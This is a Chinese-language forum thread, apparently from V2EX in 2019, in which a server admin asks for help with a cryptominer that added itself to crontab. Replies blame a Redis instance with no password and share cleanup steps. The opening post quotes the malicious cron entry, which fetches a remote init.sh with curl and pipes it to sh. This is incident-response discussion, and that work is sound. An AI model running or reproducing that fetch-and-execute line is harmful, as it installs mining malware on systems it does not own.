线上服务器 crontab 被人异常加入挖矿脚本 添加的脚本如下:
*/6 * * * * curl -fsSL http://w.3ei.xyz:43768/init.sh | sh > /dev/null 2>&1
服务器 阿里云 ceontos7 8 核心 8g 内存
环境 openresty/1.13.6.2 mysql5.7 php7.2.6 redis rabbitmq
ssh 修改了 35523 端口,禁止了 root 登录,但开了几个账号公司员工登录,密码足够复杂,
过程如上..还没解决 ,有遇到的留言 讨论下 ,哪里漏洞 解决方法,谢谢
1
CallMeReznov 2019-03-20 13:56:02 +08:00 2
|
2
aulia 2019-03-20 13:57:39 +08:00 via Android
你们机器上是不是有个空密码的 redis 在跑?
|
3
Tink 2019-03-20 14:16:30 +08:00 via iPhone
注释了就行
|
4
BigPig666 2019-03-20 14:21:25 +08:00
又不是不能用。。。
|
6
zsy979 2019-03-20 14:33:44 +08:00
昨天刚发现测试环境跑了个 xmrig。。。 又不是不能用
|
7
pmispig 2019-03-20 14:37:52 +08:00
估计 php 有漏洞被渗透获取了 webshell,你先检查下有没有奇怪的 php 文件
|
8
d0m2o08 2019-03-20 14:38:17 +08:00
把 curl 和 wget 删掉,又不是不能用
|
9
qsmy 2019-03-20 14:58:20 +08:00
还真不能用,一般都是挖门罗币,CPU 给你占满。redis 没设密码。被黑进服务器执行木马代码。定时还关不掉。高级的不止改 cron,还有伪造系统进程 httpdns、篡改系统文件 libntp.so 全程守护。
|
10
wzaqqq 2019-03-20 15:00:32 +08:00
遇到过类似的,把常用命令感染了,比对下 ss netstat top 之类的二进制的时间,不放心就一个个换。
|
11
qsmy 2019-03-20 15:01:17 +08:00
曾经分析过,感觉挺暴利的。原理还简单,利用 redis 无密码的越权漏洞,还写个 Python 扫局域网里有相同漏洞的机子。
|
12
miyuki 2019-03-20 15:03:46 +08:00 via Android
redis 公网?
|
14
viruser 2019-03-20 15:07:34 +08:00 via Android
草(日本语),这玩意连 debug_info 都没删,那专杀脚本快出了,如果着急联系下搞安全的公司
|
15
viruser 2019-03-20 15:37:58 +08:00 via Android
我不是专业的人员,所以下面内容我也不知道有没有作用...这个软件总体原理和之前的几个挖矿软件类似,修改 crontab,修改 rm,拷贝挖矿本体,看看能不能用之前的脚本删除 crontab 里的内容,然后用 busybox rm 删除 /etc/pvds /etc/httpdz /etc/migrations 还有 /etc/init.d/ats, 检查 chkconfig, 最后检查下 /tmp 下的文件。最好在 /etc/hosts 里加上 127.0.0.1 w.3ei.xyz 127.0.0.1 w.21-3n.xyz 。
|
17
libook 2019-03-20 16:31:51 +08:00
Rootkit ?
这个得亲自上机诊断才知道怎么解决吧,可以花钱找安全公司,不过有可能会比较贵。 要是机器上没有业务数据或可以安全备份业务数据,可能重装重新部署会更快更有效。 SSH 禁用密码只允许秘钥方式登录,然后所有服务都以非 root 最小权限方式运行,也可以考虑用容器直接隔离。 |
18
rootww21 2019-04-03 18:32:28 +08:00
以前碰到过 redis 无密码 挖矿程序跑满
|
19
tzwsoho 2019-05-05 14:55:25 +08:00
CentOS 6.9 Final 同样中毒,症状是 wloq 进程 CPU 100%。。
我的处理是先把 /bin/sh 改名成 /bin/sh_ex,然后 /etc/hosts 加入 127.0.0.1 w.3ei.xyz 127.0.0.1 w.21-3n.xyz 以上两步可以禁止脚本继续执行 kill -9 `pidof httpdz` kill -9 `pidof migrations` kill -9 `pidof pvds` kill -9 `pidof wloq` kill -9 `pidof initdz` chattr -i /etc/httpdz /etc/wloq /etc/initdz /etc/pvds /etc/migrations rm -f /etc/httpdz /etc/migrations /etc/pvds /etc/initdz /etc/wloq 然后 chattr -i /var/spool/cron/root chmod a+s /var/spool/cron/root vi /var/spool/cron/root :%d :wq 清空计划任务 chattr -i ~/.ssh/authorized_keys chmod a+s ~/.ssh/authorized_keys vi ~/.ssh/autorized_keys 在带有 Administrator@Guess 的那一行按 dd 删掉 :wq 这样基本就把挖矿病毒清理完了 |
20
tzwsoho 2019-05-05 14:59:37 +08:00
另外我遇到的病毒还会在硬盘上所有 jquery*.js 的末尾加上一行代码
find / -name 'jquery*.js' 找出硬盘上所有相关文件,然后删掉这行代码 |
21
baoshuai33 2019-05-07 11:57:40 +08:00
|
22
baoshuai33 2019-05-07 12:03:48 +08:00
@tzwsoho 根据这篇文章来看 https://www.anquanke.com/post/id/175725 还增加了个开机自启动脚本 ats :/etc/rc.d/init.d/ats
|
23
vipdog73 2019-05-17 11:27:53 +08:00
原本的 rm 命令被换成了 rmm。记得删掉 rmm -rf /usr/bin/rm 然后 mv /usr/bin/rmm /usr/bin/rm,如果删不掉记得看下权限。lsattr 看下是不是加了 ia 权限
|